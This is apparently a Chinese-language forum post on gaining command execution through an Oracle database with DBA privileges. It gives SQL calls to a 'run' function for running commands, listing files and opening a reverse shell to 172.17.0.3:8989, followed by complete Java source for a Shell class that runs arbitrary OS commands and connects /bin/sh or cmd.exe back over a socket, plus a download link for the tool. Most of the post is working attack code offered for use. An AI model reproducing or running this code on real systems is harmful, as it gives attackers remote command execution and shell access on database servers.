oracle 数据库命令执行

月师傅

oracleShell oracle 数据库命令执行



测试环境-DBA权限：

1. SELECT * FROM v$version
   
2. 
   
3. Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - Production
   
4. PL/SQL Release 11.2.0.1.0 - Production
   
5. "CORE        11.2.0.1.0        Production"
   
6. TNS for 32-bit Windows: Version 11.2.0.1.0 - Production
   
7. NLSRTL Version 11.2.0.1.0 - Production
   
8. Function
   
9. 命令执行
   
10. select run('exec','whoami','UTF-8') from dual;
    
11. 文件管理
    
12. select run('list','/usr','UTF-8') from dual;
    
13. 获取当前路径
    
14. select run('getCurrentDir','','UTF-8') from dual;
    
15. 反弹shell
    
16. select run('connectBack','172.17.0.3^8989','UTF-8') from dual;

复制代码

Shell.java

1. import java.io.BufferedReader;
   
2. import java.io.BufferedWriter;
   
3. import java.io.File;
   
4. import java.io.IOException;
   
5. import java.io.InputStream;
   
6. import java.io.InputStreamReader;
   
7. import java.io.OutputStream;
   
8. import java.io.OutputStreamWriter;
   
9. import java.net.Socket;
   
10. import java.util.Date;
    
11. 
    
12. public class Shell extends Object {
    
13.     public static String run(String methodName, String params, String encoding) {
    
14.         String result = "";
    
15.         if (methodName.equalsIgnoreCase("exec")) {
    
16.             result = Shell.exec(params, encoding);
    
17.         } else if (methodName.equalsIgnoreCase("list")) {
    
18.             result = Shell.list(params, encoding);
    
19.         } else if (methodName.equalsIgnoreCase("getCurrentDir")) {
    
20.             result = Shell.getCurrentDir();
    
21.         } else if (methodName.equalsIgnoreCase("connectBack")) {
    
22.             String ip = params.substring(0, params.indexOf("^"));
    
23.             String port = params.substring(params.indexOf("^") + 1);
    
24.             result = Shell.connectBack(ip, Integer.parseInt(port));
    
25.         } else {
    
26.             result = "unkown methodName";
    
27.         }
    
28.         return result;
    
29.     }
    
30. 
    
31.     public static String exec(String cmd, String encoding) {
    
32.         String result = "";
    
33.         if (encoding == null || encoding.equals("")) {
    
34.             encoding = "utf-8";
    
35.         }
    
36.         Process p;
    
37.         try {
    
38.             p = Runtime.getRuntime().exec(cmd);
    
39.             try {
    
40.                 p.waitFor();
    
41.             } catch (InterruptedException e) {
    
42.                 result += e.getMessage();
    
43.                 e.printStackTrace();
    
44.             }
    
45.             InputStream fis;
    
46.             if (p.exitValue() == 0) fis = p.getInputStream();
    
47.             else fis = p.getErrorStream();
    
48.             InputStreamReader isr = new InputStreamReader(fis);
    
49.             BufferedReader br = new BufferedReader(isr);
    
50.             String line = null;
    
51.             while ((line = br.readLine()) != null) {
    
52.                 result += line + "\n";
    
53.             }
    
54.         } catch (IOException e) {
    
55.             result += e.getMessage();
    
56.         }
    
57.         return result;
    
58.     }
    
59. 
    
60.     public static String list(String path, String encoding) {
    
61.         String result = "";
    
62.         if (encoding == null || encoding.equals("")) {
    
63.             encoding = "utf-8";
    
64.         }
    
65.         File file = new File(path);
    
66.         File[] items = file.listFiles();
    
67.         for (int i = 0; i < items.length; i++) {
    
68.             File item = items[i];
    
69.             String type = item.isDirectory() ? "<DIR>" : " ";
    
70.             String size = item.isDirectory() ? " " : item.length() / 1024 + "KB";
    
71.             if (size.equals("0KB")) size = item.length() + "Byte";
    
72.             String date = new Date(item.lastModified()).toLocaleString();
    
73.             result += date + " " + type + " " + size + " " + item.getName() + "\n";
    
74.         }
    
75.         return result;
    
76.     }
    
77. 
    
78.     public static String getCurrentDir() {
    
79.         String result = "";
    
80.         File directory = new File("");
    
81.         try {
    
82.             result = directory.getAbsolutePath();
    
83.         } catch (Exception e) {
    
84.         }
    
85.         return result;
    
86.     }
    
87. 
    
88.     public static String connectBack(String ip, int port) {
    
89.         class StreamConnector extends Thread {
    
90.             InputStream sp;
    
91.             OutputStream gh;
    
92. 
    
93.             StreamConnector(InputStream sp, OutputStream gh) {
    
94.                 this.sp = sp;
    
95.                 this.gh = gh;
    
96.             }
    
97. 
    
98.             public void run() {
    
99.                 BufferedReader xp = null;
    
100.                 BufferedWriter ydg = null;
     
101.                 try {
     
102.                     xp = new BufferedReader(new InputStreamReader(this.sp));
     
103.                     ydg = new BufferedWriter(new OutputStreamWriter(this.gh));
     
104.                     char buffer[] = new char[8192];
     
105.                     int length;
     
106.                     while ((length = xp.read(buffer, 0, buffer.length)) > 0) {
     
107.                         ydg.write(buffer, 0, length);
     
108.                         ydg.flush();
     
109.                     }
     
110.                 } catch (Exception e) {
     
111.                 }
     
112.                 try {
     
113.                     if (xp != null) xp.close();
     
114.                     if (ydg != null) ydg.close();
     
115.                 } catch (Exception e) {
     
116.                 }
     
117.             }
     
118.         }
     
119.         try {
     
120.             String ShellPath;
     
121.             if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
     
122.                 ShellPath = new String("/bin/sh");
     
123.             } else {
     
124.                 ShellPath = new String("cmd.exe");
     
125.             }
     
126.             Socket socket = new Socket(ip, port);
     
127.             Process process = Runtime.getRuntime().exec(ShellPath);
     
128.             (new StreamConnector(process.getInputStream(), socket.getOutputStream())).start();
     
129.             (new StreamConnector(socket.getInputStream(), process.getOutputStream())).start();
     
130.         } catch (Exception e) {
     
131.         }
     
132.         return "^OK^";
     
133.     }
     
134. }

复制代码

参考链接：
rebeyond-oracleShell.jar


下载地址 https://github.com/jas502n/oracleShell